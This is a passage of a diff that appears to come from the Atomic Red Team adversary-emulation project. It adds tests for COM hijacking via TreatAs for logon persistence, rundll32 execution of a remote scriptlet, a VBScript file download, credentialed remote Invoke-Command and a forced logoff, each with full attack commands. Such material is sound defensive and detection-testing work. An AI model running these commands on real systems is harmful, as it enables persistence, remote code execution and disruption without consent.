+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+ supported_platforms:
+ - windows
+ executor:
+ command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+ /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
+ REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+ /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+ -sta \"AtomicTest\" "
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
T1574.009:
technique:
x_mitre_platforms:
@@ -58867,6 +59011,44 @@ persistence:
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
+ - name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+ supported_platforms:
+ - windows
+ executor:
+ command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+ /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
+ REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+ \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+ /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+ /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+ /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+ /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+ /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+ -sta \"AtomicTest\" "
+ cleanup_command: |-
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+ name: powershell
T1137.004:
technique:
x_mitre_platforms:
@@ -67495,27 +67677,34 @@ lateral-movement:
'
name: powershell
elevation_required: true
- - name: Invoke-Command
+ - name: Remote Code Execution with PS Credentials Using Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
description: |
Execute Invoke-command on remote host.
- Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+ Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
supported_platforms:
- windows
input_arguments:
- host_name:
- description: Remote Windows Host Name
- type: String
- default: localhost
- remote_command:
- description: Command to execute on remote Host
- type: String
- default: ipconfig
+ username:
+ description: The username running the powershell command
+ type: string
+ default: "$env:USERNAME"
+ remotehost:
+ description: The remote hostname of the machine you are running the powershell
+ command on.
+ type: string
+ default: "$env:COMPUTERNAME"
+ password:
+ description: The password to be used with the user provided in the previous
+ input argument.
+ type: string
+ default: test12345
executor:
- command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-
- '
+ command: |-
+ $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+ $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+ Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -91310,6 +91499,21 @@ command-and-control:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
+ - name: Download a file using wscript
+ auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+ description: Use wscript to run a local VisualBasic file to download a remote
+ file
+ supported_platforms:
+ - windows
+ input_arguments:
+ vbscript_file:
+ description: Full path to the VisualBasic downloading the file
+ type: String
+ default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+ executor:
+ command: 'wscript.exe #{vbscript_file}'
+ cleanup_command: del Atomic-License.txt >nul 2>&1
+ name: command_prompt
T1001.002:
technique:
x_mitre_platforms:
@@ -96530,6 +96734,25 @@ impact:
'
name: bash
elevation_required: true
+ - name: Logoff System - Windows
+ auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+ description: 'This test performs a Windows system logoff as seen in [dcrat backdoor
+ capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+ '
+ supported_platforms:
+ - windows
+ input_arguments:
+ timeout:
+ description: Timeout period before shutdown (seconds)
+ type: Integer
+ default: 1
+ executor:
+ command: 'shutdown /l /t #{timeout}
+
+ '
+ name: command_prompt
+ elevation_required: true
initial-access:
T1133:
technique:
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 5e070e13..2ec818bd 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -8,7 +8,7 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
-- [Atomic Test #2 - Invoke-Command](#atomic-test-2---invoke-command)
+- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)
@@ -45,10 +45,10 @@ Enable-PSRemoting -Force
-## Atomic Test #2 - Invoke-Command
+## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
Execute Invoke-command on remote host.
-Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
**Supported Platforms:** Windows
@@ -62,15 +62,18 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| host_name | Remote Windows Host Name | String | localhost|
-| remote_command | Command to execute on remote Host | String | ipconfig|
+| username | The username running the powershell command | string | $env:USERNAME|
+| remotehost | The remote hostname of the machine you are running the powershell command on. | string | $env:COMPUTERNAME|
+| password | The password to be used with the user provided in the previous input argument. | string | test12345|
#### Attack Commands: Run with `powershell`!
```powershell
-invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+$SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
```
diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml
index d19b621d..0a47fb86 100644
--- a/atomics/T1021.006/T1021.006.yaml
+++ b/atomics/T1021.006/T1021.006.yaml
@@ -14,27 +14,34 @@ atomic_tests:
Enable-PSRemoting -Force
name: powershell
elevation_required: true
-- name: Invoke-Command
+- name: Remote Code Execution with PS Credentials Using Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
description: |
Execute Invoke-command on remote host.
- Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+ Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
supported_platforms:
- windows
input_arguments:
- host_name:
- description: Remote Windows Host Name
- type: String
- default: localhost
- remote_command:
- description: Command to execute on remote Host
- type: String
- default: ipconfig
+ username:
+ description: The username running the powershell command
+ type: string
+ default: $env:USERNAME
+ remotehost:
+ description: The remote hostname of the machine you are running the powershell command on.
+ type: string
+ default: $env:COMPUTERNAME
+ password:
+ description: The password to be used with the user provided in the previous input argument.
+ type: string
+ default: test12345
executor:
- command: |
- invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+ command: |-
+ $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+ $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+ Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
name: powershell
+
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index ffac8680..74f3f203 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -58,6 +58,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)
+- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript)
+
@@ -1132,4 +1134,41 @@ del #{local_path} >nul 2>&1
+
+
+
+## Atomic Test #26 - Download a file using wscript
+Use wscript to run a local VisualBasic file to download a remote file
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vbscript_file | Full path to the VisualBasic downloading the file | String | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+wscript.exe #{vbscript_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del Atomic-License.txt >nul 2>&1
+```
+
+
+
+
+
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index b49dd3c9..09356531 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -700,4 +700,18 @@ atomic_tests:
command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
cleanup_command: 'del #{local_path} >nul 2>&1'
name: command_prompt
-
+
+- name: Download a file using wscript
+ auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+ description: Use wscript to run a local VisualBasic file to download a remote file
+ supported_platforms:
+ - windows
+ input_arguments:
+ vbscript_file:
+ description: Full path to the VisualBasic downloading the file
+ type: String
+ default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+ executor:
+ command: 'wscript.exe #{vbscript_file}'
+ cleanup_command: del Atomic-License.txt >nul 2>&1
+ name: command_prompt
diff --git a/atomics/T1105/src/T1105-download-file.vbs b/atomics/T1105/src/T1105-download-file.vbs
new file mode 100644
index 00000000..2720a6e9
--- /dev/null
+++ b/atomics/T1105/src/T1105-download-file.vbs
@@ -0,0 +1,10 @@
+Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
+URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt"
+objWinHttp.open "GET", URL, False
+objWinHttp.send ""
+Dim BinaryStream
+Set BinaryStream = CreateObject("ADODB.Stream")
+BinaryStream.Type = 1
+BinaryStream.Open
+BinaryStream.Write objWinHttp.responseBody
+BinaryStream.SaveToFile "Atomic-License.txt", 2
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index 8702ca75..745d7f29 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -75,6 +75,16 @@ if (Test-Path #{dll_path}) {exit 0} else {exit 1}
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
```
+##### Description: PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+```
diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml
index 57bf810f..e05ab373 100644
--- a/atomics/T1134.004/T1134.004.yaml
+++ b/atomics/T1134.004/T1134.004.yaml
@@ -41,6 +41,13 @@ atomic_tests:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: |
+ PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+ prereq_command: |
+ if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 8bc8b5c9..de88a8c0 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
@@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
```cmd
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
+#### Cleanup Commands:
+```cmd
+taskkill /IM notepad.exe /f
+```
diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml
index c8f9f654..6e158223 100644
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -2,7 +2,7 @@ attack_technique: T1218.011
display_name: 'Signed Binary Proxy Execution: Rundll32'
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+ auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
description: |
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
supported_platforms:
@@ -14,7 +14,9 @@ atomic_tests:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
executor:
command: |
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ cleanup_command: |
+ taskkill /IM notepad.exe /f
name: command_prompt
- name: Rundll32 execute VBscript command
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md
index 7ea68bd4..08bebfec 100644
--- a/atomics/T1529/T1529.md
+++ b/atomics/T1529/T1529.md
@@ -24,6 +24,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
- [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux)
+- [Atomic Test #10 - Logoff System - Windows](#atomic-test-10---logoff-system---windows)
+
@@ -296,4 +298,37 @@ poweroff --reboot
+
+
+
+## Atomic Test #10 - Logoff System - Windows
+This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| timeout | Timeout period before shutdown (seconds) | Integer | 1|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+shutdown /l /t #{timeout}
+```
+
+
+
+
+
+
diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml
index bfbf82be..de248b1b 100644
--- a/atomics/T1529/T1529.yaml
+++ b/atomics/T1529/T1529.yaml
@@ -123,3 +123,19 @@ atomic_tests:
poweroff --reboot
name: bash
elevation_required: true
+- name: Logoff System - Windows
+ auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+ description: |
+ This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+ supported_platforms:
+ - windows
+ input_arguments:
+ timeout:
+ description: Timeout period before shutdown (seconds)
+ type: Integer
+ default: 1
+ executor:
+ command: |
+ shutdown /l /t #{timeout}
+ name: command_prompt
+ elevation_required: true
diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md
index ce6a555d..7eb9d858 100644
--- a/atomics/T1546.015/T1546.015.md
+++ b/atomics/T1546.015/T1546.015.md
@@ -12,6 +12,8 @@ Adversaries can use the COM system to insert malicious code that can be executed
- [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch)
+- [Atomic Test #4 - COM hijacking via TreatAs](#atomic-test-4---com-hijacking-via-treatas)
+
@@ -162,4 +164,61 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #4 - COM hijacking via TreatAs
+This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+References:
+
+https://youtu.be/3gz1QmiMhss?t=1251
+
+https://github.com/enigma0x3/windows-operating-system-archaeology
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 33eacead-f117-4863-8eb0-5c6304fbfaa9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+rundll32.exe -sta "AtomicTest"
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+```
+
+
+
+
+
diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml
index de990686..d938c90c 100644
--- a/atomics/T1546.015/T1546.015.yaml
+++ b/atomics/T1546.015/T1546.015.yaml
@@ -95,3 +95,42 @@ atomic_tests:
cleanup_command: |-
Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
name: powershell
+- name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
+ This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+ Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+ test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+ References:
+
+ https://youtu.be/3gz1QmiMhss?t=1251
+
+ https://github.com/enigma0x3/windows-operating-system-archaeology
+
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+ reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
